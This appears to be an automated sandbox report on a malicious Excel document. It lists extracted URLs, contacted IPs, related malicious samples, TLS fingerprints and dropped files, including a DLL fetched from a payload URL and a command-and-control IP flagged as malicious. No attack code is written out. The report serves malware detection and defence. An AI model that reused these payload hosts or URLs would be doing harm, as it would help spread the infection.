http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://ca.mtin.es/mtin/DPCyPoliticas0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.anf.es/AC/ANFServerCA.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.globaltrust.info0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://certificates.starfieldtech.com/repository/1604 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://acedicom.edicomgroup.com/doc0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.certplus.com/CRL/class3TS.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://crl.anf.es/AC/ANFServerCA.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.certeurope.fr/reference/pc-root2.pdf0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://ac.economia.gob.mx/last.crl0G | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.catcert.net/verarrel | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.disig.sk/ca0f | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.e-szigno.hu/RootCA.crl | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://www.sk.ee/juur/crl/0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersignroot.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.xrampsecurity.com/XGCA.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://certs.oati.net/repository/OATICA2.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.oces.trust2408.com/oces.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.quovadis.bm0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://eca.hinet.net/repository0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
http://crl.ssc.lt/root-a/cacrl.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://certs.oaticerts.com/repository/OATICA2.crl | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://certs.oati.net/repository/OATICA2.crt0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.accv.es00 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pkioverheid.nl/policies/root-policy-G20 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.netlock.net/docs | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
https://18.222.240.99/ | rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e-trust.be/CPS/QNcerts | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.ncdc.gov.sa0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://html4/loose.dtd | cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://fedir.comsign.co.il/crl/ComSignCA.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.datev.de/zertifikat-policy-int0 | cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp | false | | high
                                              http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://repository.luxtrust.lu0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://cps.chambersign.org/cps/chambersroot.html0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.acabogacia.org0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://ocsp.eca.hinet.net/OCSP/ocspG2sha20cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.firmaprofesional.com/cps0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.uce.gub.uy/acrn/acrn.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://.csscmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://crl.securetrust.com/SGCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://18.222.240.99/versalrundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.agesic.gub.uy/acrn/acrn.crl0)cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://18.222.240.99/gO~rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crl.securetrust.com/STCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.rcsc.lt/repository0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.64.132 | otusmail.com | United States | 13335 | CLOUDFLARENETUS | false
18.222.240.99 | unknown | United States | 16509 | AMAZON-02US | true
54.163.9.216 | unknown | United States | 14618 | AMAZON-AESUS | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403285
Start date: 04.05.2021
Start time: 01:12:23
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 11s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Documents_111651917_375818984.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLS@5/13@1/3
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 35.5% (good quality ratio 33.5%)
• Quality average: 78.3%
• Quality standard deviation: 29.4%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Excluded IPs from analysis (whitelisted): 52.113.196.254, 52.147.198.201, 104.43.193.48, 13.107.4.50, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 92.122.145.53, 2.20.142.210, 2.20.142.209
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, Edge-Prod-FRAr4a.env.au.au-msedge.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, skypedataprdcoleus16.cloudapp.net, teams-9999.teams-msedge.net, www.microsoft.com-c-3.edgekey.net, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.c-0001.c-msedge.net, teams-ring.teams-9999.teams-msedge.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, microsoft.com, teams-ring.msedge.net, au-bg-shim.trafficmanager.net, www.microsoft.com
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
01:14:35 | API Interceptor | 15x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.64.132 | Documents_95326461_1831689059.xls | malicious |
18.222.240.99 | Documents_95326461_1831689059.xls | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
otusmail.com | Documents_95326461_1831689059.xls | malicious | 172.67.151.10
otusmail.com | Documents_95326461_1831689059.xls | malicious | 104.21.64.132

ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02US | 4GGwmv0AJm.exe | malicious | 52.32.122.68
AMAZON-02US | c647b2da_by_Libranalysis.exe | malicious | 54.72.3.133
AMAZON-02US | #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm | malicious | 143.204.98.42
AMAZON-02US | Documents_95326461_1831689059.xls | malicious | 3.134.106.170
AMAZON-02US | 0d69e4f6_by_Libranalysis.xls | malicious | 99.83.154.118
AMAZON-02US | d630fc19_by_Libranalysis.xlsx | malicious | 52.219.40.51
AMAZON-02US | presupuesto.xlsx | malicious | 143.204.202.49
AMAZON-02US | Comand#U0103 de achizi#U021bie PP050321.exe | malicious | 3.34.241.29
AMAZON-02US | O1E623TjjW.exe | malicious | 52.52.155.86
AMAZON-02US | file.exe | malicious | 52.15.160.167
AMAZON-02US | PURCHASE ORDER.exe | malicious | 3.14.18.91
AMAZON-02US | 80896e11_by_Libranalysis.exe | malicious | 3.141.142.211
AMAZON-02US | QxnqOxC0qE.exe | malicious | 52.14.161.64
AMAZON-02US | ETC-B72-LT-0149-03-AR.exe | malicious | 3.34.241.29
AMAZON-02US | DocNo2300058329.doc__.rtf | malicious | 99.86.2.5
AMAZON-02US | nT7K5GG5km | malicious | 35.155.184.95
AMAZON-02US | Bill Of Lading & Packing List.pdf.gz.exe | malicious | 99.83.224.11
AMAZON-02US | fI1YXJEuz5.exe | malicious | 99.83.154.118
AMAZON-02US | wSBbLKrAti.exe | malicious | 99.83.154.118
AMAZON-02US | qRTSlJsJb7.exe | malicious | 99.83.154.118
AMAZON-AESUS | detection.exe | malicious | 3.212.215.225
AMAZON-AESUS | 4GGwmv0AJm.exe | malicious | 52.202.22.6
AMAZON-AESUS | #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm | malicious | 23.21.53.13
AMAZON-AESUS | OB74.vbs | malicious | 54.91.196.22
AMAZON-AESUS | 3e98fa2d_by_Libranalysis.exe | malicious | 54.235.83.248
AMAZON-AESUS | file.exe | malicious | 3.223.115.185
AMAZON-AESUS | Outstanding Payment Plan.xls | malicious | 3.227.195.104
AMAZON-AESUS | 0429_1556521897736.doc_berd.dll | malicious | 54.225.169.203
AMAZON-AESUS | KnAY2OIPI3 | malicious | 54.161.176.221
AMAZON-AESUS | Bill Of Lading & Packing List.pdf.gz.exe | malicious | 3.223.115.185
AMAZON-AESUS | pVrqrGltiL.exe | malicious | 3.233.171.147
AMAZON-AESUS | b3516494_by_Libranalysis.xls | malicious | 3.223.115.185
AMAZON-AESUS | e3d5e715_by_Libranalysis.exe | malicious | 54.243.121.36
AMAZON-AESUS | presentation.jar | malicious | 34.202.206.65
AMAZON-AESUS | presentation.jar | malicious | 3.212.50.245
AMAZON-AESUS | 8f66.xls.exe | malicious | 54.225.169.203
AMAZON-AESUS | berd.b.dll | malicious | 54.225.169.203
AMAZON-AESUS | information_178_sj.xlsx | malicious | 100.24.100.138
AMAZON-AESUS | information_178_sj.xlsx | malicious | 100.24.100.138
AMAZON-AESUS | efax637637637.htm | malicious | 50.16.177.212
CLOUDFLARENETUS | Documents_111651917_375818984.xls | malicious | 172.67.151.10
CLOUDFLARENETUS | 813oo3jeWE.exe | malicious | 104.23.98.190
CLOUDFLARENETUS | 4GGwmv0AJm.exe | malicious | 23.227.38.32
CLOUDFLARENETUS | c647b2da_by_Libranalysis.exe | malicious | 104.26.13.9
CLOUDFLARENETUS | FzDN7GfLRo.exe | malicious | 162.159.137.232
CLOUDFLARENETUS | Remittance Advice pdf.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | Yeni sipari#U015f _WJO-001, pdf.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | Documents_95326461_1831689059.xls | malicious | 172.67.151.10
CLOUDFLARENETUS | Documents_95326461_1831689059.xls | malicious | 104.21.64.132
CLOUDFLARENETUS | 5c542bb5_by_Libranalysis.exe | malicious | 104.21.84.93
CLOUDFLARENETUS | 6a9b0000.da.dll | malicious | 104.20.184.68
CLOUDFLARENETUS | 6ba90000.da.dll | malicious | 104.20.184.68
CLOUDFLARENETUS | 5c542bb5_by_Libranalysis.exe | malicious | 104.21.84.93
CLOUDFLARENETUS | s.dll | malicious | 104.20.185.68
CLOUDFLARENETUS | setup-lightshot.exe | malicious | 104.23.139.12
CLOUDFLARENETUS | s.dll | malicious | 104.20.185.68
CLOUDFLARENETUS | 74ed218c_by_Libranalysis.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | Bank payment return x.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | 471e3984_by_Libranalysis.docx | malicious | 104.22.1.232
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.GenericKD.36812138.16843.exe | malicious | 104.21.19.200

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
51c64c77e60f3980eea90869b68c58a8 | Documents_95326461_1831689059.xls | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | BUG-92361_FN-Less-Sig_dl.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | 395d57a0_by_Libranalysis.exe | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | VTBLdOa3Bk.exe | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | XiB9vZTRe5.exe | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Ulise.161906.28000.exe | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Ulise.161906.28000.exe | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | OUTSTANDING_INV_Statement_937931.xls | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | tUL1bYd7wY.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | nx7kX2s3Cz.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | lovsOrccPZ.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | eOlQnMbHch.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | ctK24ZihI3.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | wB04cTOZEz.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | qgH4ANvXyu.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | jik7JLfp8r.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | 7weHCh36Iz.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | 6nkttd2IFa.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | C9iwpuGcHW.dll | malicious | 18.222.240.99, 54.163.9.216
51c64c77e60f3980eea90869b68c58a8 | ZrYl7Wm12l.dll | malicious | 18.222.240.99, 54.163.9.216
37f463bf4616ecd445d4a1937da06e19 | Remittance Advice pdf.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | Documents_95326461_1831689059.xls | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | Tree Top.html | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | PT6-1152.doc | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | s.dll | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | setup-lightshot.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | s.dll | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | 8a793b14_by_Libranalysis.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | pic05678063.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | 6de2089f_by_Libranalysis.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | e17486cd_by_Libranalysis.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | Almadeena-Bakery-005445536555665445.scr.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | Purchase Order comfirmation to issue INVOICE.html | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | jX16Cu330u.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | 5jHZqgYHCZ.exe | malicious | 104.21.64.132
37f463bf4616ecd445d4a1937da06e19 | z3LOkpYy4s.exe | malicious | 104.21.64.132
                                                      dl6jAtWJeR.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      YVNw1T4L7m.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      QsO4ETjF7s.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132

                                                      Dropped Files

                                                      Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
                                                      • Associated Sample Name / URL: Documents_111651917_375818984.xls, Detection: malicious
                                                      • Associated Sample Name / URL: Documents_95326461_1831689059.xls, Detection: malicious
                                                      • Associated Sample Name / URL: Documents_95326461_1831689059.xls, Detection: malicious
                                                      Match: C:\Users\user\bsdnbsej.dbw
                                                      • Associated Sample Name / URL: Documents_111651917_375818984.xls, Detection: malicious
                                                      • Associated Sample Name / URL: Documents_95326461_1831689059.xls, Detection: malicious
                                                      • Associated Sample Name / URL: Documents_95326461_1831689059.xls, Detection: malicious

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                  File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):58596
                                                                  Entropy (8bit):7.995478615012125
                                                                  Encrypted:true
                                                                  SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                  MD5:61A03D15CF62612F50B74867090DBE79
                                                                  SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                  SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                  SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):3.113161810160571
                                                                  Encrypted:false
                                                                  SSDEEP:6:kK17plywTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:DMwTJrkPlE99SNxAhUe0ht
                                                                  MD5:904D08E5688145282A73D037D6307113
                                                                  SHA1:7E23A6D18C088DBB7516B9AC1855EA3435967AD2
                                                                  SHA-256:C5576BAA87E3897225C1BC617B33FA87DD8BBC1C59DFCFAEBF4237D73C776F55
                                                                  SHA-512:24878EB12E0A8712828C45F9C469AE6EAE56DEFFAF1223482462874D80C12CCB8FA6EDD14F8D36B2AD78930D540E2EBEB282CB94D25F8A507E6A10B12ECE4084
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ............r@..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):525312
                                                                  Entropy (8bit):5.949946336029269
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ga6g2O+gAaY9cc40TeAjaRoA5FZuY+F4:gZlOBAaY9RCy05FZuYq
                                                                  MD5:B80F4B91C29963DF1CFD0D0A8A30E5C6
                                                                  SHA1:09C6AE06E0C10672D91F6850118F41DC3DD66E72
                                                                  SHA-256:0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
                                                                  SHA-512:BDCD3009ED3499055CF73EF1C4DD4BD0942C8B81C395CECF3C9DA790E4867055059D10B05451476D7DA98BBBF472C40536E7A09158B5DE92C57A74E36396D10C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Joe Sandbox View:
                                                                  • Filename: Documents_111651917_375818984.xls, Detection: malicious
                                                                  • Filename: Documents_95326461_1831689059.xls, Detection: malicious
                                                                  • Filename: Documents_95326461_1831689059.xls, Detection: malicious
                                                                  Reputation:low
                                                                  IE Cache URL:https://otusmail.com/b/vegas.dll
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f].5].5].5C.45M.5C."5..5T.25Z.5].5..5C.%5A.5C.35\.5C.55\.5C.05\.5Rich].5........PE..L......`...........!.....................................................................@.........................@...T...<...P.......x.......................d.......................................@...............<............................text............................... ..`.data...d...........................@....rsrc...x...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\2[1].json
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):40
                                                                  Entropy (8bit):2.321928094887362
                                                                  Encrypted:false
                                                                  SSDEEP:3:sZkMkMkMkMkMkMi:sZZZZZZZi
                                                                  MD5:5EB7E7C038FD732524E07EEB658C1E49
                                                                  SHA1:2B68DFD9203E4391CC69061FBAEB9DA63602A9C2
                                                                  SHA-256:F6E4E5A951E30A747A8CD56976EF28CC4DED0B0A646E6A7E22900D1DB603C2C2
                                                                  SHA-512:D7F08EA48482F15BA33E8D9B99C5432F616AAE0803A9BEC91F1316AD625504A7BD8D998DF4C6DA1251B9AA5A7D34BFA502BE3D034779A83623EB5DE64C08539E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  IE Cache URL:https://54.163.9.216/1296eea0756809a848130bb326e7e01c/2
                                                                  Preview: "..G"..G"..G"..G"..G"..G"..G"..G
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\2[1].json
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):35
                                                                  Entropy (8bit):2.321928094887362
                                                                  Encrypted:false
                                                                  SSDEEP:3:sZkMkMkMkMkMi:sZZZZZZi
                                                                  MD5:2B93BDAE9428D7FCC7AEC66A90C24AC7
                                                                  SHA1:5337AE9A429A5FF7F547CF8D80C19E67AB4F6436
                                                                  SHA-256:9C46687631F4A24E226ACBF0963E755BB1EB1987882C52B2A77ADB08E1A78086
                                                                  SHA-512:2D4F79854C835182B2676E7D24495A149E96479CBDDE10A684C1F81BD977D7E437C6371BE60EA124F7B674F823D70B624ABFC1BD2D4505E39E8697EA52136835
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: "..G"..G"..G"..G"..G"..G"..G
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\fOhFGX570RDgmgTtbgZ5[1]
                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                  File Type:data
                                                                  Category:downloaded
                                                                  Size (bytes):245760
                                                                  Entropy (8bit):7.238285858768308
                                                                  Encrypted:false
                                                                  SSDEEP:6144:jMJVMl7Y2O7HGq+fvY+yZkhv4xd/S2Pn/rr3g2VQ0PhXIO:jlsB7mq+o+yZecd/S2Pn/rr3g2VWO
                                                                  MD5:AF5090353B558B80F4761A7DB1722E6F
                                                                  SHA1:6F9FB31C31CB1A7E559873427F1280F96587D8DB
                                                                  SHA-256:3F4BD952F55D1E072F409026519404AA1D88FA3B221AD3D5E21B4A2F0E9035B6
                                                                  SHA-512:B971601D95CBAF9A4CF043FEEE35D7C49A99CA4823BD68AB93D6B3679D1DC37BDB71DC1161B8510577C44539900E532598BD3502100AC84392949EED35FABF9A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  IE Cache URL:https://18.222.240.99/update/info
                                                                  C:\Users\user\AppData\Local\Temp\ECA40000
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):96279
